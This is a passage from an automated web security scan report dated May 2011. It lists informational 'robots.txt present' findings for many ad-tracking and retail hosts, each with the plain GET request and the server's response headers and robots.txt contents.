Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.p.mybuys.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:45 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Mon, 14 Mar 2011 13:58:26 GMT
ETag: "1008136-1c-49e71b4a44480"-gzip
Accept-Ranges: bytes
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

User-agent: *
Disallow: /

22.72. http://tag.admeld.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Thu, 12 May 2011 13:43:17 GMT
ETag: "5abfba-1a-4a3145f192740"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 01:56:46 GMT
Connection: close

User-agent: *
Disallow: /

22.73. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.searchignite.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.searchignite.com

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Thu, 31 Aug 2006 14:18:42 GMT
Accept-Ranges: bytes
ETag: "bbd5705c8cdc61:1fd7"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:32 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /SI/CM/

22.74. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tracking.searchmarketing.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 39
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2010 21:52:28 GMT
Accept-Ranges: bytes
ETag: "441af89b498cb1:b93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.75. http://trvlgrd.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trvlgrd.netmng.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trvlgrd.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:01 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.76. http://uat.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/pixel/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.77. http://wasc.homedepot.ca/b/ss/homedepotca/1/H.22.1/s06511195921339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wasc.homedepot.ca
Path:	/b/ss/homedepotca/1/H.22.1/s06511195921339

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "6c5213-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www19
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.78. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.aisle7.net
Path:	/api/1.0/widgets/general/newswire-widget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: web.aisle7.net

Response

HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/plain
Content-Location: http://web.aisle7.net/robots.txt
Last-Modified: Wed, 11 May 2011 22:12:19 GMT
Accept-Ranges: bytes
ETag: "b881607e2810cc1:f32"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:58:42 GMT
Connection: close
Set-Cookie: aisle7c6=4090937773.1.3050751040.2687628825; path=/

...User-agent: *
Disallow: /

22.79. http://www.acehardware.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.80. https://www.acehardware.com/coreg/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.81. http://www.armaniexchange.com/category/womens.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.armaniexchange.com
Path:	/category/womens.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:28 GMT
ETag: "22-9fd2a500"
Content-Type: text/plain
Cache-Control: max-age=5433
Expires: Mon, 16 May 2011 03:25:55 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /admin/

22.82. https://www.armaniexchange.com/account/login.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/account/login.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:48 GMT
ETag: "22-a103d200"
Content-Type: text/plain
Cache-Control: max-age=14334
Expires: Mon, 16 May 2011 06:12:11 GMT
Date: Mon, 16 May 2011 02:13:17 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /admin/

22.83. http://www.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bhphotovideo.com

Response

22.84. http://www.bluefly.com/__ssobj/ard.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/__ssobj/ard.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluefly.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:32 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 28 Apr 2011 14:44:20 GMT
ETag: "b825-3bd-4a1fb97a6d900"
Accept-Ranges: bytes
Content-Length: 957
Content-Type: text/plain
Set-Cookie: TLTHID=6BA402047F60107F2403A028ED8DE8C8; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6BA402047F60107F2403A028ED8DE8C8; Path=/; Domain=.bluefly.com
Set-Cookie: SSLB=0; path=/; domain=.bluefly.com
RTSS: 1
Keep-Alive: timeout=5, max=246
Connection: close
Set-Cookie: TS18d374=ef46fa3174a9a069b71be27f16ae4b15d543d56dccf397b04dd0857c; Path=/

User-agent: *
Allow: /
Disallow: /myfly/
Disallow: /myaccount/
Disallow: /cart/
Disallow: /browse/quickLogin.jsp
Disallow: /browse/pdpQuickAdd.jsp
Disallow: /browse/f_quick_buy.jsp
Disallow: /
...[SNIP]...

22.85. http://www.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluenile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 02:03:09 GMT
Content-Length: 1593
Content-Type: text/plain;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET

User-agent: *
Disallow: /emails/
Disallow: /login/
Disallow: /promos/
Disallow: /wwwcore/
Disallow: /images/
Disallow: /ai/
Disallow: /assets/
Disallow: /services/
Disallow: /rss/
Di
...[SNIP]...

22.86. https://www.brookstone.com/imageservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/imageservlet

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brookstone.com

Response

HTTP/1.0 200 OK
Server: BigIP
Connection: close
Content-Length: 49

# no bots allowed here
User-agent: *
Disallow: /

22.87. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.42.220.35
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.88. http://www.footlocker.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

22.89. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

22.90. http://www.ftd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=48AA12C67F5F107F001EB2E881408840; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=48AA12C67F5F107F001EB2E881408840; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Content-Type: text/plain
Content-Length: 186
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 767403390
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml

22.91. http://www.gnc.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:17 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 298
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:17 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.92. https://www.gnc.com/coreg/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "67872c-12a-4a17de6ae2900"
Accept-Ranges: bytes
Content-Length: 298
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:14 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /coreg/
Disallow: /gcoreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /emailFriend/
Disallow: /emailSignup/

...[SNIP]...

22.93. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 16 May 2011 01:53:14 GMT
Expires: Mon, 16 May 2011 01:53:14 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.94. http://www.googleadservices.com/pagead/conversion/1052618686/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1052618686/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Mon, 16 May 2011 01:55:04 GMT
Expires: Mon, 16 May 2011 01:55:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.95. http://www.guitarcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:35 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...

22.96. https://www.guitarcenter.com/MyAccount/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:11:35 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...

22.97. http://www.helzberg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helzberg.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:42 GMT
ETag: "74f-91f27980"
Content-Type: text/plain
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Content-Length: 1871
Connection: close

User-agent: *
Crawl-delay: 30
Request-rate: 1/30
Disallow: /admin/
<%-- Merge for Helzberg 5.7 upgrade - Feb 4, 2010 starts. --%>
Disallow: /account/
Disallow: /util/
Disallow: /ancillary/Than
...[SNIP]...

22.98. https://www.helzberg.com/account/login.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/login.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:25 GMT
ETag: "598-90ef1340"
Content-Type: text/plain
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:13 GMT
Content-Length: 1432
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /account/
Disallow: /util/
Disallow: /ancillary/ThankYou.jsp
Disallow: /ancillary/Unsubscribe.jsp
Disallow: /ancillary/custserv
Disallow: /api/
Disall
...[SNIP]...

22.99. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.ca
Path:	/webapp/wcs/stores/servlet/Home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Mar 2011 16:39:36 GMT
Content-Type: text/plain
Date: Mon, 16 May 2011 01:53:27 GMT
Content-Length: 379
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 11:19:53 GMT

User-agent: *

Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&catalogId=10051&langId=-15&display=services_holmes
Disallow: /webapp/wcs/stores/servlet/DisplayTemplate?storeId=10051&
...[SNIP]...

22.100. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "1d807d-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:57:30 GMT
Connection: close

User-agent: *
Disallow: /

22.101. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Mon, 16 May 2011 10:22:42 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

22.102. http://www.orderhouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orderhouse.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orderhouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:11 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.103. https://www.orderhouse.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orderhouse.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:14 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.104. http://www.orientaltrading.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orientaltrading.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Sep 2009 23:16:52 GMT
Accept-Ranges: bytes
Content-Length: 354
Content-Type: text/plain
Date: Mon, 16 May 2011 01:58:38 GMT
Connection: close

# robots.txt for http://www.orientaltrading.com/sitemap.xml

User-agent: *

#affiliates directory
Disallow: /application
Disallow: /aff/
Disallow: /business_edition/
Disallow: /carnival/
Disallow
...[SNIP]...

22.105. http://www.petco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petco.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Aug 2010 21:52:58 GMT
ETag: "bc6b7cbbb135cb1:107a"
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
X-Strangeloop: RCache
X-SL-RCache: Cached
Date: Mon, 16 May 2011 01:57:00 GMT
Content-Length: 267
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.

# Spider instructions for all web servers in the production pool
# Thu, 11 Dec 2008 06:18:00 -0400

# Exclude Files From All Robots:

User-agent: *
Disallow: /secure/
Disallow: /cart/
Disa
...[SNIP]...

22.106. http://www.petsmart.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.107. https://www.petsmart.com/coreg/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/coreg/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 14 Aug 2009 08:45:06 GMT
ETag: "53c0d0-15b-4711611a3a880"
Accept-Ranges: bytes
Content-Length: 347
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /coreg/
Disallow: /checkout/
Disallow: /compare/
Disallow: /history/
Disallow: /include/
Disallow: /pop_ups/
Disallow: /cgi-bin/
Disallow: /
...[SNIP]...

22.108. http://www.redcrossstore.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcrossstore.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:07:39 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

22.109. https://www.redcrossstore.org/Shopper/ContactInfo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.redcrossstore.org
Path:	/Shopper/ContactInfo.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcrossstore.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 May 2009 16:37:42 GMT
Accept-Ranges: bytes
ETag: "0cf4cf81fd3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:32:09 GMT
Connection: close
Content-Length: 239

...# robots.txt for http://www.orderhouse.com/

User-agent: *
Disallow: /Buyer/
Disallow: /BuyerAdmin/
Disallow: /Supplier/
Disallow: /SupplierAdmin/
Disallow: /Admin/
Disallow: /ScriptRe
...[SNIP]...

